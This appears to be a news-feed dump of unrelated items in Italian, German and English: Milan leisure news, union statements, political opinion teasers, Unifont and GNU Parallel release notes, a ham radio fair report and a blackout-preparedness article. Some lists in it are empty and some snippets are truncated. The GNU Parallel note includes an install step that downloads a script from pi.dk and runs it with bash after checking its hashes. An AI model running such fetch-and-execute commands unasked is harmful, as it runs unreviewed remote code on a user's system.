The Kubuntu Focus team has upped the performance ante of its M2 and Zr laptops with the latest, greatest CPUs from Intel.
L’Istituto storico della Resistenza e dell’età contemporanea in Provincia di Livorno, quale centro di ricerca storica e di conservazione del patrimonio bibliotecario e archivistico, presenta le iniziative realizzate sul territorio nel corso del 2025. Questo in continuità con le nostre principali finalità: la ricerca e la divulgazione storica e culturale, l’attività di didattica e di formazione, l’incremento e la custodia del patrimonio documentario.
Per tutta la stagione estiva, nel centro di Milano, arriva una nuova destinazione pensata per chi ama il design e gli aperitivi all’aria aperta. All’interno del cortile di Palazzo Cordusio Gran Meliá ha aperto il Café Swarovski, un esclusivo pop-up estivo che veste il Giardino Cordusio con un allestimento ispirato all’inconfondibile stile della celebre maison austriaca.
Un’esperienza estiva nel cuore della città
L’iniziativa sarà aperta fino alla fine di settembre ed è il risultato della collaborazione tra Swarovski e Palazzo Cordusio Gran Meliá, uno degli hotel di lusso più recenti del centro milanese.
Un’oasi verde a pochi passi dal Duomo
Ogni giorno migliaia di persone attraversano Piazza Cordusio senza immaginare che, dietro lo storico edificio progettato da Luca Beltrami alla fine del XIX secolo, si trovi un elegante giardino interno immerso nella tranquillità.
Dal 2023 il palazzo ospita Palazzo Cordusio Gran Meliá, hotel cinque stelle che ha restituito alla città uno spazio per anni destinato agli uffici. Oggi il Giardino Cordusio è una delle location più raffinate dove fermarsi per un pranzo, un cocktail o un aperitivo nel cuore di Milano.
L’atmosfera firmata Swarovski
Per l’estate 2026 il giardino si rinnova completamente grazie al Café Swarovski. L’allestimento richiama l’eleganza degli anni Sessanta con colori pastello, dettagli luminosi, lampadari impreziositi da cristalli, sedute in velluto e tessuti personalizzati.
L’idea è quella di offrire un’esperienza immersiva capace di fondere design, ospitalità e cucina in una delle cornici più affascinanti del centro cittadino.
Cocktail e dolci dal tocco scenografico
Il menù include cocktail, bevande e dessert creati appositamente per questa esperienza, con una presentazione che richiama l’estetica Swarovski. Tra gli elementi più originali spicca il ghiaccio a forma di diamante, studiato per valorizzare ogni drink. Alcune proposte vengono inoltre servite sulle eleganti porcellane della collezione Swarovski x Rosenthal.
Una delle novità dell’estate a Milano
Negli ultimi anni Piazza Cordusio è diventata uno dei simboli della nuova Milano dedicata al lusso e all’ospitalità internazionale. Il Café Swarovski si inserisce perfettamente in questo contesto, proponendo un’esperienza a tempo che combina moda, design e gastronomia in una location esclusiva.
Per chi desidera vivere un aperitivo o una pausa in un luogo fuori dal comune, il giardino segreto di Palazzo Cordusio è senza dubbio una delle proposte più interessanti dell’estate milanese.
L'articolo Il giardino nascosto di Palazzo Cordusio si trasforma con il Café Swarovski proviene da InfoMilano.news.
Chi desidera trascorrere qualche ora nella natura senza lasciare Milano ha una nuova destinazione da scoprire. All’interno di Oasi Ca’ Granda, nella zona sud della città, è stato inaugurato il Campo dei Girasoli: uno spazio circondato dal verde dove passeggiare tra oltre 30.000 girasoli, avventurarsi in un labirinto naturale e vivere un’esperienza rilassante a contatto con l’ambiente.
Situato in via Ripamonti 101, all’interno di una delle aree verdi più grandi di Milano, il nuovo campo si candida a diventare uno dei luoghi simbolo dell’estate.
Un grande polmone verde alle porte della città.
Con una superficie di oltre 45 ettari, Oasi Ca’ Granda è uno degli angoli più suggestivi del capoluogo lombardo. Al suo interno si alternano campi coltivati, risaie, orti, frutteti, aree umide e percorsi naturalistici, offrendo un paesaggio che fa dimenticare di trovarsi a pochi minuti dal centro.
L’oasi ospita inoltre numerose specie animali e rappresenta un’occasione ideale per riscoprire la ricchezza della biodiversità locale.
Un mare di girasoli e un percorso tutto da vivere.
La grande novità dell’estate 2026 è il Campo dei Girasoli, un’immensa distesa fiorita che invita grandi e piccoli a passeggiare tra i filari, rilassarsi e immortalare scorci dai colori vivaci.
Tra gli elementi più apprezzati spicca il labirinto naturale realizzato all’interno del campo, pensato per regalare un’esperienza divertente e coinvolgente a tutta la famiglia.
Completano l’allestimento aree dedicate al relax, punti panoramici e installazioni perfette per ammirare il paesaggio e scattare fotografie.
Porta a casa un girasole !
Tra le esperienze proposte c’è anche la possibilità di raccogliere un girasole e conservarlo come ricordo della visita.
Un gesto semplice che permette di vivere ancora più da vicino il legame con la natura e con il mondo agricolo.
Aperitivi al tramonto e sapori del territorio !
Il Campo dei Girasoli è anche un luogo dove trascorrere piacevoli momenti all’aria aperta.
Durante la stagione vengono organizzati aperitivi al tramonto, eventi e iniziative dedicate alla valorizzazione delle eccellenze locali.
Un’occasione per rilassarsi nel verde, gustare prodotti a chilometro zero e godersi l’atmosfera dei tramonti estivi nella campagna milanese.
Un appuntamento disponibile solo per poche settimane.
Essendo legato alla fioritura stagionale, il Campo dei Girasoli sarà aperto soltanto per un periodo limitato. Per questo gli organizzatori consigliano di prenotare con anticipo, in particolare nei weekend e nelle fasce orarie più richieste.
Tra passeggiate, fotografia, relax ed esperienze nella natura, il nuovo spazio di Oasi Ca’ Granda rappresenta un modo originale per vivere l’estate a Milano e concedersi una pausa dal ritmo della città senza dover andare lontano.
PRENOTAZIONI :
https://www.eventbrite.it/e/campo-dei-girasoli-tickets-1991905455839
Info Milano
L'articolo 30.000 girasoli, aperitivi immersi nel verde e natura: l’esperienza dell’estate a Milano proviene da InfoMilano.news.
A mesi dalle mobilitazioni culminate nei due giorni di sciopero del febbraio 2026, durante i quali lavoratori e attivisti USB sono stati minacciati di licenziamento e denuncia per i picchetti davanti alla sede aziendale, restano irrisolte le gravi criticità nell'appalto DHL di Livorno.
B.S. Autotrasporti continua a sottrarsi a un confronto serio con i lavoratori e con USB. Il dialogo con coordinatori e responsabili è spesso inesistente, rendendo impossibile affrontare i problemi che emergono quotidianamente.
USB ha proposto incontri periodici tra coordinatori e corrieri per migliorare l'organizzazione dei giri, distribuire equamente i carichi di lavoro, prevenire contestazioni disciplinari e rendere più efficiente il servizio. Una proposta che l'azienda continua a ignorare.
Ai lavoratori viene imposto il rigoroso rispetto delle procedure DHL senza garantire condizioni che consentano di operare in sicurezza, nel rispetto del Codice della Strada e delle normative vigenti. Carichi di lavoro e tempi di consegna rendono sempre più difficile rispettare contemporaneamente tutte queste prescrizioni.
Restano inoltre aperte le violazioni contrattuali: decurtazioni unilaterali di ferie e ROL per esigenze aziendali, senza il consenso dei lavoratori, e il mancato riconoscimento della maggiorazione prevista dal CCNL per il personale di magazzino impiegato il sabato.
Dopo essere stata costretta a riconoscere USB come interlocutore sindacale, l'azienda continua a mantenere un atteggiamento ostile verso i lavoratori organizzati. Contestazioni disciplinari e sanzioni vengono applicate a pioggia e con crescente severità. Si passa da pesanti decurtazioni salariali a sospensioni dal lavoro e dalla retribuzione sempre più lunghe, con un progressivo inasprimento dell'azione disciplinare che sembra preludere anche al possibile ricorso al licenziamento. Un'escalation che, in diversi casi, assume un evidente carattere intimidatorio e ritorsivo nei confronti di chi rivendica i propri diritti o partecipa all'attività sindacale.
A fronte di questi provvedimenti, l'azienda continua inoltre a non fornire documentazione che dimostri l'effettiva applicazione delle presunte penali da parte della committenza DHL, utilizzate per giustificare le sanzioni.
Persistono pressioni e intimidazioni nei confronti dei lavoratori, in particolare degli iscritti e dei delegati sindacali, in un clima incompatibile con le libertà garantite dalla Costituzione e dallo Statuto dei Lavoratori. Non si tratta di episodi isolati, ma di un quadro complessivo che sembra mirare a scoraggiare ogni forma di iniziativa collettiva.
Emerge una precisa volontà di comprimere gli spazi del conflitto sindacale, trattando l'organizzazione dei lavoratori come un ostacolo alla continuità del servizio e alla circolazione delle merci, anziché come un diritto. Quando l'attività sindacale viene ostacolata, chi sciopera viene intimidito e chi organizza la protesta viene colpito con provvedimenti disciplinari o minacciato di conseguenze ancora più gravi, non è in discussione soltanto la posizione dei singoli lavoratori, ma il diritto collettivo di organizzarsi, contrattare e costruire rapporti di forza per difendere salario e sicurezza.
Per tutte queste ragioni USB ha riaperto formalmente lo stato di agitazione dal 6 maggio. Nonostante le ripetute richieste, l'azienda continua a rifiutare un confronto effettivo e ad assumere impegni concreti per risolvere i problemi denunciati dai lavoratori.
USB continuerà a intervenire su tutti i piani, sindacale, legale e di mobilitazione, per difendere diritti, sicurezza, salario e il pieno esercizio delle libertà sindacali.
Dopo aver formalmente diffidato l'azienda, denunciamo pubblicamente questo atteggiamento e ribadiamo che non accetteremo ulteriori intimidazioni, ricatti o comportamenti discriminatori.
USB LIVORNO

Gamers using KDE’s Plasma desktop have been suffering from a slight input delay in mouse movement that could lead to getting fragged.



di Valentina Bennati comedonchisciotte.org Dalla pandemia globale dichiarata nel 2020 ai conflitti internazionali, passando per crisi economiche, tensioni sociali e un flusso continuo di notizie allarmanti, sono tante le persone che, negli ultimi anni, hanno iniziato a vivere in uno stato di tensione quasi permanente. Giorno dopo giorno siamo stati esposti a immagini, informazioni e […]
L'articolo Vivere sempre sotto pressione indebolisce il corpo: come spezzare il circolo dello stress proviene da Come Don Chisciotte.
Di Alireza Niknam Negli ultimi anni, il nome dell’Albania è stato citato più che mai in relazione a progetti e attori stranieri. Questo piccolo Paese dei Balcani, che un tempo cercava di presentarsi come modello di stabilità e sviluppo nell’Europa sud-orientale, si trova ora a dover affrontare seri interrogativi riguardo alla propria autonomia […]
L'articolo MEK e Sionismo, come l’Albania rischia di diventare la seconda Israele proviene da Come Don Chisciotte.
Pensavo di sapere cosa fosse la sofferenza, finché non l’ho vissuta davvero. Quello che ho scoperto era diverso, strano e doloroso. Com’è curioso il dolore. Nonostante la sua amarezza, nonostante il nostro desiderio di starne lontani quanto l’oriente è lontano dall’occidente, quando arriva c’è in esso una certa dolcezza. Sì, dolcezza. Per molto […]
L'articolo Un ferito di Gaza racconta le ventiquattro ore trascorse sotto un albero, dove dolore, morte, memoria e speranza si sono intrecciati nella guerra proviene da Come Don Chisciotte.
Di ConiareRivolta.org Per comprendere quale sarà l’impatto più duraturo del Governo Meloni sugli assetti economici dell’Italia, è sufficiente guardare alla recente Comunicazione della Commissione europea sul cosiddetto “Pacchetto primavera”, quell’insieme di raccomandazioni che la Commissione europea indirizza agli Stati membri dell’Unione per orientare politiche di bilancio e riforme. È il cuore della disciplina fiscale […]
L'articolo Il Pacchetto primavera della Ue e il pacco del Governo Meloni proviene da Come Don Chisciotte.
La Redazione di ComeDonChisciotte.org esprime le più sentite condoglianze alla famiglia, agli amici e ai colleghi del giornalista Vito Monaco, scomparso all’età di 81 anni. Monaco era volto notissimo dell’emittente tv Canale Italia. I funerali si terranno sabato 27 giugno alle 9.30 nel Duomo di Abano Terme.
L'articolo Addio a Vito Monaco, i funerali ad Abano Terme il 27 Giugno proviene da Come Don Chisciotte.

28 June 2026 Unifont 17.0.05 is now available. This is a minor release aligned with Unicode 17.0.0.
This release notably includes separate BDF, PCF, and OpenType font files with Unicode T-source Chinese glyphs created by Kusanagi_Sans and Kao Chen-tung (高振東) in font files beginning with "unifont_t". Many other Chinese glyphs have been added. See the ChangeLog file for details.
Download this release from GNU server mirrors at:
https://ftpmirror ... /unifont-17.0.05/
or if that fails,
https://ftp.gnu.o ... /unifont-17.0.05/
or, as a last resort,
ftp://ftp.gnu.org ... /unifont-17.0.05/
These files are also available on the unifoundry.com website:
https://unifoundr ... /unifont-17.0.05/
Font files are in the subdirectory
https://unifoundr ... 0.05/font-builds/
A more detailed description of font changes is available at
https://unifoundr ... nifont/index.html
and of utility program changes at
https://unifoundr ... nt-utilities.html
Information about Hangul modifications is at
https://unifoundr ... hangul/index.html
and
http://unifoundry ... l-generation.html


Drei Tage lang traf sich die internationale Amateurfunk-Gemeinschaft an der Ham Radio in Friedrichshafen. Für die Schweizer YLs und OM stand das Wochenende vom 26. bis 28. Juni 2026 ganz im Zeichen des Netzwerkens: Alte Freunde treffen und neue Kontakte knüpfen prägten das Geschehen am Stand der USKA.
Der direkte Austausch stand im Mittelpunkt. Viele angereiste Funkbegeisterte nutzten die Gelegenheit, um Fachgespräche zu vertiefen und bestehende Kontakte aufzufrischen. «Der persönliche Schwatz hier in den Hallen ist wirklich etwas sehr Spezielles, vor allem, wenn man sich sonst nur über den Transceiver trifft», bilanzierte ein Schweizer Besucher am Samstagabend.
Anstossen auf den Ham-Spirit
Zu den Höhepunkten des Messeprogramms gehörten die traditionellen Apéros am Stand der USKA, die am Freitag und am Samstag stattfanden (im Bild: Apéro am Samstag). Die Resonanz war an beiden Anlässen sehr gross: Jeweils rund 200 Gäste haben miteinander auf den Ham-Spirit angestossen.
Angesichts der hohen Temperaturen an diesem Wochenend griffen die Besucher neben Wein, Orangensaft und Knabbersnacks vor allem zu einer Erfrischung: viel Wasser. Die Logistik vor Ort funktionierte reibungslos und bot den passenden Rahmen, um ungezwungen miteinander ins Gespräch zu kommen.
Rundum gelungene Messe
Nach drei intensiven Messetagen bleibt ein positives Fazit. Ein grosses Dankeschön geht an alle Teilnehmerinnen und Teilnehmer, die die Veranstaltung mit Leben gefüllt haben. Gleichzeitig verdient die Leistung der Messeleitung Anerkennung: Ein grosses Kompliment geht an die Verantwortlichen in Friedrichshafen für die Organisation einer einmal mehr rundum gelungenen Ham Radio.
Published: HB9HGH 2026-06-28 12:50:02

GNU Parallel 20260622 ('Rape Gang Inquiry') has been released. It is available for download at: lbry://@GnuParallel:4
Quote of the month:
GNU Parallel is much nicer than xargs and more powerful ... definitely recommended!
-- boomertsfx@reddit
New in this release:
GNU Parallel - For people who live life in the parallel lane.
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
find . -name '*.jpg' |
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/
You can install GNU Parallel in just 10 seconds with:
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
12345678 c555f616 391c6f7c 28bf9380 44f4ec50
$ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
70727536 3428aa9e 9a136b9a 7296dfe4
$ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
$ bash install.sh
Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
When using programs that use GNU Parallel to process data for publication please cite:
O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.
If you like GNU Parallel:
If you use programs that use GNU Parallel for research:
If GNU Parallel saves you money:
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
When using GNU SQL for a publication please cite:
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

Di Joshua Stylman Pillole per svegliarsi, pillole per dormire Pillole, pillole, pillole ogni giorno della settimana Pillole per camminare, pillole per pensare Pillole, pillole, pillole per la famiglia – St. Vincent Il mondo sta impazzendo, o è solo che tutti prendono qualcosa? Mi guardo intorno e, sinceramente, non riesco più a capirlo. […]
L'articolo Pillole: non ti sei ammalato. Sei stato arruolato proviene da Come Don Chisciotte.
Di Nicola Bielli per ComeDonChisciotte.org “Britannia rules the waves” di Nicholas Habbe: Britannia – armata di lancia, elmo e scudo in rilievo con le armi reali britanniche – è seduta in una quadriga insieme a Nettuno, armata del suo tridente. Mentre l’Europa assiste all’ennesima escalation del confronto tra NATO e Russia, una domanda continua […]
L'articolo La City contro la Russia? Dietro la crisi europea il ritorno dell’antica guerra tra il mare e la terra proviene da Come Don Chisciotte.
Federico Dal Cortivo per il quotidiano l’Adige di Verona ha intervistato il prof. Andrea Zhok filosofo accademico, professore di antropologia filosofica e filosofia morale presso l’Università di Milano, ricercatore e saggista. Ha curato la prefazione del saggio di Frank Furedi, professore di Sociologia all’Università del Kent, a Canterbury “I confini contano. Perché l’umanità deve riscoprire l’arte […]
L'articolo Prof. Andrea Zhok: “La cancellazione dei confini nazionali è funzionale ai grandi interessi finanziari” proviene da Come Don Chisciotte.
Di Ali Ahmadi, The Cradle L’accordo quadro che ha posto fine alla guerra del 2026 con l’Iran è stato interpretato dalla maggior parte di Washington come una concessione. I commentatori conservatori considerano il memorandum d’intesa (MoU) come una sorta di “ricompensa” concessa a un Paese che avrebbe dovuto essere lasciato a fare i […]
L'articolo Stati Uniti-Iran: il cessate il fuoco di una guerra che Washington non può più sostenere proviene da Come Don Chisciotte.
Di Guido Cappelli Le ultime elezioni politiche, nell’ormai lontano settembre 2022, videro la partecipazione di ben tre liste che erano espressione, in varia misura, di quell’“area del dissenso” nata e cresciuta al calor delle lotte con la follia pandemica e il mostruoso dispositivo autorizzatorio noto come green pass‒ un vulnusalla libertà civile e […]
L'articolo La rana, lo scorpione e il mondo del dissenso proviene da Come Don Chisciotte.

L'articolo Contenuti con intelligenza artificiale: perché il prompt non basta proviene da FullPress.
La rapida diffusione degli Agenti AI sta creando un ecosistema sempre più complesso nel quale modelli linguistici, strumenti esterni e componenti aggiuntivi collaborano per svolgere attività operative. Questa architettura modulare, però, sta aprendo una nuova superficie di attacco che ricorda da vicino le vulnerabilità già viste nel mondo open source e nei marketplace di applicazioni. […]
L'articolo Falsa skill elude gli scanner e a raggiunge più di 26.000 agenti AI proviene da Securityinfo.it.
Ieri sera, 25 giugno 2026, la Quarta Sezione Penale della Corte di Cassazione ha reso definitive le condanne per la strage ferroviaria di Viareggio del 29 giugno 2009, in cui persero la vita 32 persone e oltre un centinaio rimasero ferite. Rigettati i ricorsi degli imputati, è confermata tra le altre la condanna a cinque anni per Mauro Moretti, ex amministratore delegato di Ferrovie dello Stato e RFI.
USB Toscana esprime vicinanza ai familiari delle vittime e a tutte le lavoratrici e i lavoratori ferroviari che per diciassette anni hanno tenuto viva la memoria e la battaglia per la giustizia.
Una giustizia parziale, strappata metro per metro
Questa condanna definitiva è un risultato importante, ma non cancella né le ferite di chi ha perso una persona cara, né quelle prodotte dal percorso giudiziario stesso. Nel 2021 la Cassazione aveva dichiarato prescritti i reati di omicidio colposo, non riconoscendo l'aggravante della violazione delle norme sulla sicurezza sul lavoro. Trentadue persone morte, e l'omicidio andato in prescrizione: un paradosso che rivela tutto il limite di un sistema che tutela i potenti più delle vittime. Tutte le condanne riguardano il solo reato di disastro ferroviario colposo, l'unico sopravvissuto alla ghigliottina della prescrizione. Come ricordano i familiari: la prescrizione non è un'assoluzione.
Le responsabilità sono di classe, non solo individuali
Nel processo è emersa una deliberata politica aziendale improntata al risparmio sulla sicurezza e alla massimizzazione dei profitti, con un rischio consapevolmente scaricato su lavoratori e cittadini. Quella notte non fu una fatalità: fu il frutto della ricerca del profitto a tutti i costi. I tagli al personale, la deregolamentazione della manutenzione, l'esternalizzazione a catena delle responsabilità erano il sistema. Moretti ne era il volto pubblico, non un'eccezione. Cinque anni di pena per 32 vite spezzate non è la giustizia che queste famiglie meritano. Lo ricorda bene Daniela Rombi, presidente de "Il Mondo che vorrei", che nella strage perse una figlia di ventuno anni: "Sette tribunali hanno detto che sono colpevoli e la prescrizione non è un'assoluzione. Per noi restano colpevoli anche dei reati prescritti."
La lotta deve continuare: salari, salute e sicurezza sul lavoro
Viareggio non è un caso isolato: è il punto più tragico di una linea che attraversa decenni di tagli, precarizzazione e smantellamento delle tutele. Ogni anno in Italia muoiono migliaia di lavoratrici e lavoratori, e la risposta giudiziaria arriva decenni dopo, ridotta dalla prescrizione. Non basta. USB si batte ogni giorno su tre fronti inscindibili: salari dignitosi, salute nei luoghi di lavoro, sicurezza reale — non quella scritta nei contratti e ignorata nei fatti. Lo abbiamo fatto nelle vertenze, negli scioperi contro i piani industriali che svuotano gli organici, nelle lotte di chi lavora in condizioni insicure senza voce per dirlo. La logica che ha prodotto Viareggio, il profitto prima delle persone, è la stessa che USB contrasta ogni giorno nei trasporti, nella logistica, nella scuola, nella sanità, nell'industria. Non si tratta di sicurezza come voce di bilancio: si tratta di vite umane da tutelare.
Alle famiglie che hanno lottato per diciassette anni diciamo: siete stati voi i veri protagonisti di questa storia. Noi non vi lasceremo da soli.
USB Toscana

netqmail sono ora compatibili con le nuove versioni di gcc e clang.netqmail-1.07 i vecchi sorgenti di netqmail

Nell’aprile del 2025, la penisola Iberica con gran parte della Francia, affronta un blackout su larga scala per diverse ore, causato da un malfunzionamento della linea di distribuzione elettrica.
All’epoca parlammo già di questo episodio con un articolo ad hoc.
Quest’anno, purtroppo, è toccato al nostro paese.
Negli ultimi giorni diverse zone del Nord Italia sono rimaste improvvisamente senza energia elettrica. Guasti alle linee e cabine elettriche hanno lasciato centinaia di famiglie al buio per diverse ore. Episodi simili sono stati segnalati in numerose aree del Paese.
Per molti si è trattato semplicemente di un disagio temporaneo: qualche ora senza luce, il condizionatore fermo e il frigorifero spento. Ma questi eventi rappresentano anche un’occasione per fermarsi a riflettere su un aspetto che spesso diamo per scontato: quanto dipendiamo dall’energia elettrica?
Fino a pochi decenni fa un’interruzione della corrente significava principalmente accendere una candela e attendere il ritorno dell’energia. Oggi la situazione è completamente diversa. La nostra vita quotidiana ruota attorno all’elettricità: lavoriamo da casa, comunichiamo attraverso Internet, paghiamo con strumenti elettronici, utilizziamo cancelli automatici, pompe dell’acqua, sistemi di allarme, elettrodomestici e dispositivi medici. Basta osservare una normale abitazione per rendersi conto di quanto ogni attività dipenda, direttamente o indirettamente, dalla presenza della corrente.
Naturalmente nessuno può affermare che questi blackout siano il segnale di un imminente collasso della rete elettrica italiana. Sarebbe una conclusione affrettata e priva di fondamento. Tuttavia è altrettanto vero che le reti di distribuzione stanno affrontando nuove sfide. Le estati sempre più calde comportano un utilizzo massiccio dei climatizzatori, gli eventi meteorologici estremi diventano più frequenti e molte infrastrutture, realizzate decenni fa, richiedono continui interventi di manutenzione e ammodernamento. In questo contesto è ragionevole aspettarsi che episodi di interruzione dell’energia possano verificarsi con maggiore frequenza rispetto al passato.
Il Sole 24 Ore spiega bene cosa sta accadendo, cosi come il Post.
La preparazione, però, non nasce dalla paura. Nasce dal buon senso.
Uno dei principi fondamentali del prepping consiste proprio nel prepararsi agli eventi più probabili, non necessariamente a quelli più catastrofici. Un blackout di alcune ore è infinitamente più probabile di molti altri scenari di cui spesso si parla sui social. Eppure sono proprio questi piccoli eventi a coglierci impreparati.
Provate ad immaginare una normale serata estiva. Fuori ci sono oltre trenta gradi, il sole è appena tramontato e improvvisamente tutta la casa rimane al buio. Il condizionatore si spegne, il Wi-Fi scompare, il cancello automatico non si apre più e la batteria del telefono è quasi scarica. Se l’interruzione dovesse protrarsi per qualche ora, anche il frigorifero inizierebbe lentamente a perdere la propria capacità di conservazione e molte persone inizierebbero a chiedersi semplicemente: “E adesso cosa faccio?”
Le principali cause sono:
In molti casi non è la produzione di energia a mancare, ma è la rete di distribuzione locale ad andare in difficoltà.
Caldo, blackout e città sempre più invivibili: non è un caso.
I cavi elettrici che portano energia nelle case passano sottoterra.
Quando aumenta l’uso dei condizionatori, si surriscaldano e devono disperdere più calore.
Il problema? Coprendo il suolo naturale con asfalto e cemento, nelle città le temperature salgono molto di più (a Torino oltre 65°C sull’asfalto). Questo impedisce ai cavi di raffreddarsi.
Risultato:
E non finisce qui:
Il punto è semplice: Il consumo di suolo non è progresso. Il È uno spreco che crea problemi reali per tutti. (nota personale a cura di Lavino Pasquale)

Molti pensano semplicemente:
“Si spegne la luce.”
In realtà gli effetti possono essere molto più ampi.
Ad esempio:
La differenza tra vivere questa situazione con tranquillità oppure con ansia spesso dipende da pochi semplici accorgimenti preparati in anticipo. Avere una torcia facilmente raggiungibile evita di cercare una candela al buio. Una power bank mantenuta carica consente di utilizzare il telefono anche dopo diverse ore. Una piccola radio portatile permette di ricevere informazioni nel caso in cui le reti dati risultino congestionate o temporaneamente non disponibili. Sono oggetti di uso comune, economici e facilmente reperibili, ma che acquistano un valore enorme proprio quando vengono realmente utilizzati.
Anche il comportamento durante un blackout può fare la differenza. Una delle prime reazioni istintive è quella di aprire continuamente il frigorifero per controllare il cibo. In realtà ogni apertura disperde il freddo accumulato, riducendo il tempo di conservazione degli alimenti. Se lo sportello rimane chiuso, un frigorifero moderno riesce generalmente a mantenere una temperatura sicura per circa quattro ore, mentre un congelatore pieno può conservare gli alimenti anche per uno o due giorni.
Frigo e Congelatore – la prima preoccupazione
in caso di disservizio elettrico (blackout), il frigorifero è l’elettrodomestico che occupa il primo posto nei nostri pensieri.
Per ovvie ragioni perderà relativamente velocemente la capacità di raffreddamento degli alimenti, così come quella di congelamento, la cosa sarà più celere nel momento in cui apriamo lo sportello.
Ebbene c’è una alternativa di backup anche per questo.
Il pozzetto congelatore ad apertura verticale lavora meglio.
Il frigorifero ha lo sportello ad apertura frontale, per tanto l’aria fredda incamerata, essendo più pesante e posizionata sul fondo della camera, ad ogni apertura uscirà completamente facendo entrare aria più calda.
Il pozzetto congelatore invece aprendosi verso l’alto mantiene più facilmente l’aria fredda incamerata, oltre a consumare meno corrente di un qualsiasi frigorifero.
Il dubbio spontaneo che sorge è: il pozzetto però congela! È possibile con qualche accorgimento intelligente adattarne l’uso come frigorifero.

Prima di tutto occorre procurarsi una presa termostata con sonda, quest’ultima andrà inserita all’interno del congelatore in modo da rilevare la temperatura.
La presa poi va collegata ad una power station in modo da alimentare il pozzetto in caso di blackout.
Impostare la temperatura della presa termostata sui 4°\6° che è orientativamente quella del frigorifero.
Collegare poi un pannello solare alla power station.

Come funziona il tutto? Il pozzetto comincerà a raffreddare, ma quando raggiungerà la temperatura impostata sulla presa, questa toglierà alimentazione fino a quando la temperatura del pozzetto non incomincia ad essere più alta di quella impostata
Quando manca la corrente:
Vale la pena ricordare anche che non tutti i sistemi di pagamento continuano a funzionare durante un’interruzione prolungata. Alcuni negozi potrebbero non riuscire ad utilizzare i terminali POS, i distributori di carburante potrebbero essere fuori servizio e perfino la rete telefonica, se il blackout dovesse protrarsi a lungo, potrebbe iniziare a risentirne con il progressivo esaurimento delle batterie di backup installate presso le stazioni radio base.
Per questo motivo l’Associazione Italiana Prepper invita da sempre a sviluppare una cultura della resilienza domestica. Non significa riempire il garage di attrezzature costose o immaginare scenari apocalittici. Significa semplicemente essere in grado di affrontare serenamente le prime ventiquattro o quarantotto ore di un imprevisto, riducendo lo stress e aumentando la sicurezza della propria famiglia.
Prepararsi ad un blackout è probabilmente una delle forme di prevenzione più semplici, economiche e concrete che ogni cittadino possa mettere in pratica. Una torcia, una radio, una riserva d’acqua, qualche alimento pronto al consumo e una fonte di energia portatile rappresentano un investimento minimo rispetto alla tranquillità che possono offrire quando tutto, improvvisamente, si spegne.
L’Associazione Italiana Prepper consiglia di predisporre un piccolo kit dedicato.
In fondo è proprio questa la filosofia del prepping: non aspettare che si verifichi un’emergenza per iniziare a chiedersi cosa sarebbe stato utile avere. Prepararsi prima significa affrontare dopo qualsiasi imprevisto con maggiore lucidità, sicurezza e consapevolezza. Perché la resilienza non si improvvisa nel momento del bisogno: si costruisce un piccolo passo alla volta, molto prima che si spengano le luci.
Puoi affrontare serenamente 24 ore senza corrente?
L'articolo Blackout sempre più frequenti: siamo davvero preparati? proviene da Associazione Italiana Preppers.

Immagine in evidenza rielaborata con Intelligenza Artificiale
Negli ultimi mesi, molte delle aziende che avevano sottoscritto contratti con OpenAI o Anthropic hanno avuto una brutta sorpresa. Lo scorso aprile, la società di noleggio auto con conducente Uber ha per esempio scoperto di aver già bruciato tutto il budget annuale destinato all’intelligenza artificiale. Una situazione simile si è verificata anche dalle parti del gigante dei supermercati Walmart, che ha introdotto in tutta fretta un limite all’utilizzo dei large language model da parte dei suoi dipendenti.
Un’azienda rimasta anonima avrebbe invece speso 500 milioni di dollari in un solo mese a causa dell’utilizzo sfrenato di Claude da parte dei suoi dipendenti, mentre persino un colosso come Meta ha imposto dei limiti all’utilizzo dei sistemi d’intelligenza artificiale generativa, come hanno fatto anche Amazon, AT&T, Brex e numerose altre società.
Che cos’è successo? Non eravamo nell’epoca del tokenmaxxing, ovvero la gara a chi usa di più l’intelligenza artificiale all’interno delle aziende? Per capire come mai la situazione sia cambiata così rapidamente basta sapere che, nel corso della prima metà del 2026, OpenAI e Anthropic hanno entrambi cambiato le condizioni dei contratti aziendali: non più una tariffa fissa anche per usare i loro sistemi più avanzati e specialistici, ma una tariffa a consumo – basata sulla quantità di “token” elaborati dai vari ChatGPT Codex, Claude Cowork e altri ancora – che ha fatto esplodere i costi in maniera imprevista.
